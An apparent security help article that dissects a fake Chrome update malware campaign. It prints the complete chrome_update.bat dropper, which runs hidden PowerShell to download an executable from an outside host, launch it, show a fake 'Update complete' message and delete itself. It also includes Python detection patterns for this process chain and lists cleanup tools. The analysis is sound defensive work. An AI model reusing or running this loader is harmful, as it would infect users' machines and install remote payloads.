How to fix the Critical Chrome Update Virus Malware Attack
The Critical Chrome Update malware attack has been going around and is getting past many antivirus solutions. Do not click the Download Now button.
What does this do? A brief analysis
The Download Now button downloads the following chrome_update.bat file:
- The script uses a PowerShell command to download a .dat file and rename it to a randomly named .exe file.
- It then runs this file in the background and attempts to inject script into currently running processes.
- You are then notified "Update complete" with an OK button to dismiss the message.
- By clicking OK, you are installing install_flash.js, which contains VB script.
chrome_update.bat contents

```bat
@echo off
echo a=new ActiveXObject('Wscript.Shell'); a.run("PowerShell -WindowStyle Hidden $d=$env:temp+'\\16330788701ac441736751e3ee3c6996.exe'; (New-Object System.Net.WebClient).DownloadFile('https://eeteeinsightsoft.org/17/524.dat',$d); Start-Process $d; [System.Reflection.Assembly]::LoadWithPartialName('System.Windows.Forms'); [system.windows.forms.messagebox]::show('Update complete.','Information',[Windows.Forms.MessageBoxButtons]::OK, [System.Windows.Forms.MessageBoxIcon]::Information)",0,false); >"%temp%\install_flash.js"
start /min "" wscript.exe "%temp%\install_flash.js"
DEL "%~f0"
```
Full analysis of this payload chrome_update.bat[1] at Payload Security.
More information about install_flash.js[2] at Malwr.com.
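The process chain in chrome_update.bat (a script host running a script from the temp folder, which then starts a hidden PowerShell that downloads and launches a file) can be matched in process-creation logs. The following Python is an added example, not part of the original article; the event field names, sample paths and the example.invalid URL are constructed assumptions.

```python
import re

# Traits of the chrome_update.bat chain as seen in process-creation telemetry.
HIDDEN = re.compile(r"-w(?:in(?:dowstyle)?)?\s+hidden", re.I)
DOWNLOAD = re.compile(r"\.DownloadFile\s*\(", re.I)
LAUNCH = re.compile(r"\bStart-Process\b", re.I)
SCRIPT_HOST = re.compile(r"(?:^|\\)[wc]script\.exe$", re.I)
SCRIPT_IN_TEMP = re.compile(r"\\Temp\\[^\"\\]+\.(?:jse?|vb[se]|wsf)\b", re.I)


def classify(event):
    """Return the findings for one process-creation event (a dict)."""
    image, cmd = event["image"], event["command_line"]
    parent = event.get("parent_image", "")
    findings = []
    if SCRIPT_HOST.search(image) and SCRIPT_IN_TEMP.search(cmd):
        findings.append("script_host_runs_script_from_temp")
    if image.lower().endswith("\\powershell.exe"):
        if DOWNLOAD.search(cmd) and LAUNCH.search(cmd):
            findings.append("powershell_download_and_execute")
        if HIDDEN.search(cmd) and SCRIPT_HOST.search(parent):
            findings.append("hidden_powershell_from_script_host")
    return findings


# Constructed sample events; the field names, paths and URL are assumptions.
PS = r"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe"
WS = r"C:\Windows\System32\wscript.exe"
EVENTS = [
    {"parent_image": r"C:\Windows\System32\cmd.exe", "image": WS,
     "command_line": r'wscript.exe "C:\Users\a\AppData\Local\Temp\install_flash.js"'},
    {"parent_image": WS, "image": PS,
     "command_line": r"PowerShell -WindowStyle Hidden $d=$env:temp+'\sample.exe'; (New-Object "
                     r"Net.WebClient).DownloadFile('https://example.invalid/s.dat',$d); Start-Process $d"},
    {"parent_image": r"C:\Windows\explorer.exe", "image": PS,
     "command_line": r"powershell.exe -NoProfile -File C:\Scripts\backup.ps1"},
    {"parent_image": r"C:\Windows\explorer.exe", "image": WS,
     "command_line": r'wscript.exe "C:\Program Files\Vendor\logon.vbs"'},
]


def triage(events):
    """Return (index, findings) for every event with at least one finding."""
    return [(i, f) for i, e in enumerate(events) if (f := classify(e))]


if __name__ == "__main__":
    for index, findings in triage(EVENTS):
        print(index, findings)
```

The two benign events (a scheduled PowerShell script and a logon script outside the temp folder) produce no findings, which is the baseline to check before tuning these patterns against real telemetry.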
What to do if you did click the Download Now button?
1. Run Malwarebytes Adwcleaner and JRT[3][4]
2. Run Bleeping Computer's Rkill[5]
3. Run Malwarebytes[6]
4. Run Hitman Pro[7]
5. Run Windows Defender[8] or Windows Security Essentials[9] for Windows 7 or earlier.
6. Run your Anti-Virus Solution in Deep Scan Mode
7. Clear your Chrome cache
- Open Chrome.
- On your browser toolbar, click More.
- Point to More tools, and then click Clear browsing data.
- In the "Clear browsing data" box, click the check box only for Cached images and files.
- Use the menu at the top to select the amount of data that you want to delete. Choose beginning of time to delete everything.
- Click Clear browsing data.
References
- [1] chrome_update.bat (www.hybrid-analysis.com)
- [2] install_flash.js (malwr.com)
- [3] Adwcleaner (www.malwarebytes.com)
- [4] JRT (www.malwarebytes.com)
- [5] Rkill (www.bleepingcomputer.com)
- [6] Malwarebytes (www.malwarebytes.com)
- [7] Hitman Pro (www.hitmanpro.com)
- [8] Windows Defender (www.microsoft.com)
- [9] Windows Security Essentials (support.microsoft.com)